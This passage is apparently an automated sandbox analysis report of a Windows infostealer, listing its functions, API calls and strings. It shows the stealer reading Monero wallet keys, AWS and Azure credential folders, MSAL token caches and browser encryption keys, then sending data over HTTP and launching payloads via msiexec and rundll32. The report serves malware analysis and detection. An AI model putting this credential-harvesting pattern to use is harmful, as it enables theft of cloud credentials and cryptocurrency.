                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: fc814eaa07c9bc007434521f3c3f28017581faac67c6b8b6e5d4f4c3023cdf5c
                                    • Instruction ID: 2c8d6fd681f70be958437b09f4d82fa816f1a730785d907b61bfc45bf3c2fa91
                                    • Opcode Fuzzy Hash: fc814eaa07c9bc007434521f3c3f28017581faac67c6b8b6e5d4f4c3023cdf5c
                                    • Instruction Fuzzy Hash: 3D120FB191011CAADB25EB50DC92FFEB378AF14340F5041A9B20A625A5EFB42F49DF61
                                    Function 00FEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0180D5E0,00000000,?,0100144C,00000000,?,?), ref: 00FECA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FECA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00FECA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FECAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FECAD9
                                    • StrStrA.SHLWAPI(?,0180D5F8,01000B52), ref: 00FECAF7
                                    • StrStrA.SHLWAPI(00000000,0180D640), ref: 00FECB1E
                                    • StrStrA.SHLWAPI(?,0180D9C8,00000000,?,01001458,00000000,?,00000000,00000000,?,01808F40,00000000,?,01001454,00000000,?), ref: 00FECCA2
                                    • StrStrA.SHLWAPI(00000000,0180D9E8), ref: 00FECCB9
                                      • Part of subcall function 00FEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FEC871
                                      • Part of subcall function 00FEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FEC87C
                                    • StrStrA.SHLWAPI(?,0180D9E8,00000000,?,0100145C,00000000,?,00000000,01809010), ref: 00FECD5A
                                    • StrStrA.SHLWAPI(00000000,01809230), ref: 00FECD71
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B46), ref: 00FEC943
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B47), ref: 00FEC957
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B4E), ref: 00FEC978
                                    • lstrlen.KERNEL32(00000000), ref: 00FECE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00FECE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: c223659b1fb90df1d8a9c41bd0f07afd6022612b8931c06ced31fc1aac2982cd
                                    • Instruction ID: 5180a4461f5d9d88b21d4a543c521a85a5894dbf8f50ab2adb53b267dbeb9397
                                    • Opcode Fuzzy Hash: c223659b1fb90df1d8a9c41bd0f07afd6022612b8931c06ced31fc1aac2982cd
                                    • Instruction Fuzzy Hash: 8DE112B180010CABDB25EFA0DC95FFE7778AF14340F404169F20A675A5EF786A4ADB61
                                    Function 00FF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,0180B4F0,00000000,00020019,00000000,010005B6), ref: 00FF83A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FF8426
                                    • wsprintfA.USER32 ref: 00FF8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FF847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8499
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: f178c7e22433d7e3dc7e730d66dd922eef76b32a6fa5716ae359b4f8230cbad5
                                    • Instruction ID: 393a0897674518d88edf841518d19b19e4fb821684a52ba36a03d9f88c324a69
                                    • Opcode Fuzzy Hash: f178c7e22433d7e3dc7e730d66dd922eef76b32a6fa5716ae359b4f8230cbad5
                                    • Instruction Fuzzy Hash: 1F810AB191111CAADB24DF50DC95FEE77B8BF08740F008298E209A6590DF756F86DF90
                                    Function 00FF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00FF4DCD
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF492C
                                      • Part of subcall function 00FF4910: FindFirstFileA.KERNEL32(?,?), ref: 00FF4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00FF4E59
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FDC), ref: 00FF4971
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FE0), ref: 00FF4987
                                      • Part of subcall function 00FF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FF4B7D
                                      • Part of subcall function 00FF4910: FindClose.KERNEL32(000000FF), ref: 00FF4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FF4EE5
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF49B0
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,010008D2), ref: 00FF49C5
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF49E2
                                      • Part of subcall function 00FF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF4A1E
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,0180EAC0), ref: 00FF4A4A
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,01000FF8), ref: 00FF4A5C
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,?), ref: 00FF4A70
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,01000FFC), ref: 00FF4A82
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,?), ref: 00FF4A96
                                      • Part of subcall function 00FF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF4AAC
                                      • Part of subcall function 00FF4910: DeleteFileA.KERNEL32(?), ref: 00FF4B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 431791c7df35d1184177cb1453df234fe83823db34d4d3d1aabb567457093541
                                    • Instruction ID: f33d159caf2d2a5851073ab6032603eae0cc3fd686d4d93d01cdbeb2566fa1f8
                                    • Opcode Fuzzy Hash: 431791c7df35d1184177cb1453df234fe83823db34d4d3d1aabb567457093541
                                    • Instruction Fuzzy Hash: 374154B9A4020867DB60F770EC47FED7238AF64740F004558B689660C5EEF89B99DB92
                                    Function 00FF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: edf1255768972d5dddcdf449e0720ad12f319399e706cb1aa33ee2a7cb76ea62
                                    • Instruction ID: f1b5f758146b814756cff4783122c9b8c6794b39762b775f89d81bbc3030a6f0
                                    • Opcode Fuzzy Hash: edf1255768972d5dddcdf449e0720ad12f319399e706cb1aa33ee2a7cb76ea62
                                    • Instruction Fuzzy Hash: 3E710E75900208ABDB24DFE4EC89FEEB7B8BF48700F108518F616A7694DB74A905DB61
                                    Function 00FF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: de9c607173b41d574db8aa4e3d0465015711ffb816d9b6c790d308550fa966de
                                    • Instruction ID: 926cd59ed7f5ad4ba5e682c3ddf564fc8ae84cd85ced2a5462663b5598db964e
                                    • Opcode Fuzzy Hash: de9c607173b41d574db8aa4e3d0465015711ffb816d9b6c790d308550fa966de
                                    • Instruction Fuzzy Hash: B51201B181010CAADB15FB90DC92FFDB778AF14340F504169F60A661A5EFB82B4ADF52
                                    Function 00FF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE6280: InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                      • Part of subcall function 00FE6280: StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                      • Part of subcall function 00FE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                      • Part of subcall function 00FE6280: HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                      • Part of subcall function 00FE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                      • Part of subcall function 00FE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5318
                                    • lstrlen.KERNEL32(00000000), ref: 00FF532F
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00FF5364
                                    • lstrlen.KERNEL32(00000000), ref: 00FF5383
                                    • lstrlen.KERNEL32(00000000), ref: 00FF53AE
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: e9a9d9238cdac9651488797f01dc99fe192249ef87847e5ce7d13e950565717b
                                    • Instruction ID: 73e7e4218fb74d948f42b7b525a75ec8481507501e168e989ea90242317654a2
                                    • Opcode Fuzzy Hash: e9a9d9238cdac9651488797f01dc99fe192249ef87847e5ce7d13e950565717b
                                    • Instruction Fuzzy Hash: 77510EB191014CDBDB14FF60CD96AFD7779AF10340F508018FA0A5A6A1EF786B15EB52
                                    Function 00FF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 42036d81160380d02fe4a28be08eee550078efed1d9e28390de11a56db5ea059
                                    • Instruction ID: 39d004bc829972db7d48db8ed29d9ae147985260855bf6903c4704a81db1d605
                                    • Opcode Fuzzy Hash: 42036d81160380d02fe4a28be08eee550078efed1d9e28390de11a56db5ea059
                                    • Instruction Fuzzy Hash: 88C1A5B690011DABCB24EF60DC89FFE7378BF54304F004598F20AA7251EA74AA95DF91
                                    Function 00FF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF42EC
                                    • lstrcat.KERNEL32(?,0180E470), ref: 00FF430B
                                    • lstrcat.KERNEL32(?,?), ref: 00FF431F
                                    • lstrcat.KERNEL32(?,0180D598), ref: 00FF4333
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8D90: GetFileAttributesA.KERNEL32(00000000,?,00FE1B54,?,?,0100564C,?,?,01000E1F), ref: 00FF8D9F
                                      • Part of subcall function 00FE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FE9D39
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
